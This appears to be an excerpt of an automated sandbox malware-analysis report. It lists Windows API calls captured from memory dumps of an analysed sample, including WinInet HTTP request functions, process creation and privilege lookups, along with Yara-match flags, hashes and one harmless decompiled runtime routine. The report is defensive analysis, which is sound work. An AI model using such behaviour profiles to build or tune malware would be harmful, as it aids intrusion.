                                              • Opcode ID: f7e62581bdf5e54d50b847bde377a54af7212648e73e1094bfc029c46de1363f
                                              • Instruction ID: 51c856255f1a62140ae41ff357873562ca99154fed4b496dcb466373125ccec9
                                              • Opcode Fuzzy Hash: f7e62581bdf5e54d50b847bde377a54af7212648e73e1094bfc029c46de1363f
                                              • Instruction Fuzzy Hash: 1B900261242041567955B15944045074406ABE42857D1C022A1406960C8566E85AF661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3a1ca7076e0b2458b1192854b5d932fbff0e985f5211b0a614e657b35c1abb33
                                              • Instruction ID: 267ebed1745b0c5489ac03657c4b7aade6b357878fa26bb94e2b189f4e0702a0
                                              • Opcode Fuzzy Hash: 3a1ca7076e0b2458b1192854b5d932fbff0e985f5211b0a614e657b35c1abb33
                                              • Instruction Fuzzy Hash: 029002B120100406F5507159440474604059BD4345F91C021A5056564E8699DDD976A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 47ace76e15a7a343aec176aff26a96f317e18cf23f8d282e39f0685eaa75f2b5
                                              • Instruction ID: 02845317f7defc90407b848847cb90d968869b0fd6948aa8ab7f6f2645a515c0
                                              • Opcode Fuzzy Hash: 47ace76e15a7a343aec176aff26a96f317e18cf23f8d282e39f0685eaa75f2b5
                                              • Instruction Fuzzy Hash: 399002A134100446F51061594414B060405DBE5345F91C025E1056564D8659DC567166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                               • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
                                               • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 03ee1b9b90a69163a71a10127d3aaf5f955b14109c3f6ef2c03d7ddebefe6835
                                              • Instruction ID: 1c3db153baa8fa2ead280ff91690705dfa0747b44af06edbcb625831a4e5a94b
                                              • Opcode Fuzzy Hash: 03ee1b9b90a69163a71a10127d3aaf5f955b14109c3f6ef2c03d7ddebefe6835
                                              • Instruction Fuzzy Hash: 1F90026121180046F61065694C14B0704059BD4347F91C125A0146564CC955D8657561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02D18D58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpOpenRequest
                                              • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                              • API String ID: 1984915467-4016285707
                                              • Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                              • Instruction ID: 081a4caabe925580186537e232a5e1f4952c8b5aa9ed5f504c6a4b9b4f4b9d15
                                              • Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                              • Instruction Fuzzy Hash: CA01E9B2905118AFDB04DF98D841DEF7BB9EB48210F158289FD08A7305D670ED10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02D18DCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                              • API String ID: 360639707-2503632690
                                              • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                              • Instruction ID: 0cc6d2204b07e3eb8c845a448fc73442f5d9f1d93a9f28181833bb31300b5824
                                              • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                              • Instruction Fuzzy Hash: BC014BB2905218AFDB04DF98D841AEFBBB8EB58210F108189FD08A7304D670EE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 02D18CD8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ConnectInternet
                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                              • API String ID: 3050416762-1024195942
                                              • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                              • Instruction ID: 1939c71d09dda4e6fcfdf0e11b9490c44c0fb4394ee89c3adfefb8df7a7df9a5
                                              • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                              • Instruction Fuzzy Hash: 5F01E9B2915119AFDB14DF99D941EEF77B9EB48310F158289BE08A7240D630EE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02D18DCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID: Http$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                              • API String ID: 360639707-1070052511
                                              • Opcode ID: 661a3126977b1c249245908ec5c512718867f14d4ea756906b3e136782e994a2
                                              • Instruction ID: e98b4dda3a12fff8e9b1911534e0f6b154edf63b0c0fc375cfdda0e870666e55
                                              • Opcode Fuzzy Hash: 661a3126977b1c249245908ec5c512718867f14d4ea756906b3e136782e994a2
                                              • Instruction Fuzzy Hash: 8401ADB1809298AFDB04CF98D840ABFBBB8EF55210F04869CFD586B300C3309901CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02D18C57
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: InternetOpen
                                              • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                              • API String ID: 2038078732-3155091674
                                              • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                              • Instruction ID: d61203629e59f9fd8e1c5fad4e07876a8cb4d48db58468ffa20534827af2a186
                                              • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                              • Instruction Fuzzy Hash: 47F01DB2901118AF9B14DFD8DC419EB77B9EF48310B048589BD1897301D635AE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(02D13536,?,02D13CAF,02D13CAF,?,02D13536,?,?,?,?,?,00000000,00000000,?), ref: 02D188DD
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D03B93), ref: 02D1891D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateFree
                                              • String ID: .z`
                                              • API String ID: 2488874121-1441809116
                                              • Opcode ID: ae8cd478b69552064149f2d8c6b63cfce8613677c2427c42e847110b6c861fb2
                                              • Instruction ID: 9664d99862b0fd10c8ee807b8c20a1fc7fb0490412f3ff64f313b6e8ad0f5ef4
                                              • Opcode Fuzzy Hash: ae8cd478b69552064149f2d8c6b63cfce8613677c2427c42e847110b6c861fb2
                                              • Instruction Fuzzy Hash: D4F06DB2204204AFDB04DFA8EC44EEB3769EF88354F01855AF91C97341C631E910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 02D173A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
                                              • Instruction ID: cccf713333d56c74d1931217d05f828afd5f1bd1bb9a27e9c037f9e870e1fe4d
                                              • Opcode Fuzzy Hash: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
                                              • Instruction Fuzzy Hash: 41317AB6602600BBD711EF64D8A1FABB7A9EB88700F00811DFA599B641D730B845CBE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 02D173A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 5ec9b7b12874398c0c2206ba652979740e3718ba864f53283c2692dd3a8cbd38
                                              • Instruction ID: 5963f2c1bf299674da41997bfdfb890365de2758d41e3ac3d767d5c5ace14690
                                              • Opcode Fuzzy Hash: 5ec9b7b12874398c0c2206ba652979740e3718ba864f53283c2692dd3a8cbd38
                                              • Instruction Fuzzy Hash: 2F317CB6901300BBD710EF64D8A1F6BB7B9EB88700F108129FA599B641D770A845CBE5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D03B93), ref: 02D1891D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction ID: d1076bd0accfa8cc35edca94376bfc9596e05cdb286131222af14505f8021208
                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction Fuzzy Hash: 70E012B1200208ABDB18EF99DC48EA777ADEF88750F018558FA085B241C630E910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D072DA
                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D072FB
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                              • Instruction ID: ca6c8ed480de28a7c494144176bd3ee8f9b983f4150e712db3ff3097aca9879f
                                              • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                              • Instruction Fuzzy Hash: 4801F231A8032977E720A6A59C42FFEB72C9B00F50F044118FF04BA2C1EA947D068AF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D09BB2
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction ID: 6c0560b67b234bb447d717505ff0d3308cb702d2c1ff1d3e6a3146ff37259672
                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction Fuzzy Hash: B1010CB5E0020DBBDF10DAA4EC91FDEB3799B54718F004195A90897685F671EA14CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D189B4
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 4012af57132fdf84e715f4ab5b4be26cab70deab7d2d820ebc0255ea5c9d7ff6
                                              • Instruction ID: d273fea850dc90ebdffe6b7b910b6a5f1ff62e47178e6425c282773d7fcea3c0
                                              • Opcode Fuzzy Hash: 4012af57132fdf84e715f4ab5b4be26cab70deab7d2d820ebc0255ea5c9d7ff6
                                              • Instruction Fuzzy Hash: FB01AFB2210108BFCB54CF99DD94EEB77AAAF8C354F158258FA0DE7254C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D189B4
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction ID: 3b9c7bb5cd1a2bf04501f938e9a8c0bab2091b0eb40b0acccf236b8b4ec26b73
                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction Fuzzy Hash: AE01AFB2214108BBCB54DF89DC90EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D0CCF0,?,?), ref: 02D1746C
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 301ba72de499be6b6f63082158b1da9bde1bd3350a698f254bab4a33bdeb0a3a
                                              • Instruction ID: 04c69e23b530ff22467871b1b6c347eab717b23b6b6e70de6cd1e43f7875a8a5
                                              • Opcode Fuzzy Hash: 301ba72de499be6b6f63082158b1da9bde1bd3350a698f254bab4a33bdeb0a3a
                                              • Instruction Fuzzy Hash: A1E092333803043AE33065A9AC02FA7B79DCB81B64F540026FA4DEB6C0D695F80146A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D189B4
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 2d2d5fc37828ac5e6410b35890493890fe9536200e702cb44647a751abf7e4bb
                                              • Instruction ID: 414631892b5a0c2ed6278e80fc85c7e526b76e1a5617efd6efb7fa23a8fd60c3
                                              • Opcode Fuzzy Hash: 2d2d5fc37828ac5e6410b35890493890fe9536200e702cb44647a751abf7e4bb
                                              • Instruction Fuzzy Hash: 64E0B6B6254409AF9B04CF98EC90CEB73EEEB8C614B149618FA5DC7245C231EC528BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D0CFC2,02D0CFC2,?,00000000,?,?), ref: 02D18A80
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 370dfa4cd592b8b665c46a4c69f64ad7f74a99e464ae28e3aa76f68a298a63b4
                                              • Instruction ID: be0848a470afcc228a8a27dfc05c4b63f8298b589d585e8dc8ea55833ff69731
                                              • Opcode Fuzzy Hash: 370dfa4cd592b8b665c46a4c69f64ad7f74a99e464ae28e3aa76f68a298a63b4
                                              • Instruction Fuzzy Hash: 43E022B16082842BDB10DF28DC85ED73FA9DF4A250F14869DFC881B603C435A805CBB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D0CFC2,02D0CFC2,?,00000000,?,?), ref: 02D18A80
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction ID: 88f40cdc2c582a8bfc55167dad114028804d7f91faeb587bf3938058703a5525
                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction Fuzzy Hash: 57E01AB12002086BDB10DF49DC84EE737ADEF88650F018154FA0857241C930E950CBF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(02D13536,?,02D13CAF,02D13CAF,?,02D13536,?,?,?,?,?,00000000,00000000,?), ref: 02D188DD
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction ID: 0b1d4b07b7f6712999225cd5e9a4509787b2eca752c525cc3ae17d3599fe36e3
                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction Fuzzy Hash: 78E012B1200208ABDB14EF99DC44EA777ADEF88650F118558FA085B241C630F910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02D07C83,?), ref: 02D0D45B
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 65610bb5aa841d86ff45519bcbd3c93a2f9a1c146bcad54572f3fe3041351d84
                                              • Instruction ID: 3326711adf6ef3ef061165ef1c50d6d2798d4f5a4794be1b2c2e0e32c563ca91
                                              • Opcode Fuzzy Hash: 65610bb5aa841d86ff45519bcbd3c93a2f9a1c146bcad54572f3fe3041351d84
                                              • Instruction Fuzzy Hash: 3DD02B3575030037E710EFA4DC46F563795AB50B44F090154F50CDB3C3D624D405C220
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02D07C83,?), ref: 02D0D45B
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                              • Instruction ID: 62c275de1aa69500302bf3df118358dc31be804905d08a2699cab7017fc43a2c
                                              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                              • Instruction Fuzzy Hash: B4D05E657503043AE610AAA49C02F2632899B45A44F494064FA48963C3DA50E8008561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
• Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
• Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4d0cfbc8809cf3e4e13b3d67f34b464da0434db787e08339f27d67d75a09bc4c
                                              • Instruction ID: 3967452773f721ad1ebb4948fd7ccfa12f451338435a96a3e01478388345b2a2
                                              • Opcode Fuzzy Hash: 4d0cfbc8809cf3e4e13b3d67f34b464da0434db787e08339f27d67d75a09bc4c
                                              • Instruction Fuzzy Hash: 14B09BF19015C5C9FB11D76047087177D017BD4745F56C061D2031651A4778D095F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 53%
                                              			E047BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];
                                              				_t15 = _t12;
                                              				_t7 = E0476CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E047B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;
                                              				if(_t9 == 0xffffffff) {
                                              					_t10 = 0;
                                              				} else {
                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                              				return E047B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                              			}
                                              0x047bfdda
                                              0x047bfde2
                                              0x047bfde5
                                              0x047bfdec
                                              0x047bfdfa
                                              0x047bfdff
                                              0x047bfe0a
                                              0x047bfe0f
                                              0x047bfe17
                                              0x047bfe1e
                                              0x047bfe19
                                              0x047bfe19
                                              0x047bfe19
                                              0x047bfe20
                                              0x047bfe21
                                              0x047bfe22
                                              0x047bfe25
                                              0x047bfe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047BFDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047BFE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047BFE01
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
• Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp
• Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 243fd6dd8724b2cbf2b576d67f6156360489145de2727c6b7fd00d7cd60b0371
                                              • Instruction ID: fb75e007bbbba1f22e74ca171a8d193489f4ca82da2fc0649a258acd68121116
                                              • Opcode Fuzzy Hash: 243fd6dd8724b2cbf2b576d67f6156360489145de2727c6b7fd00d7cd60b0371
                                              • Instruction Fuzzy Hash: 81F0F676200641BFE7211E59DC06F73BB6AEB45B34F140354FA68562E1EA62F83097F4
                                              Uniqueness

                                              Uniqueness Score: -1.00%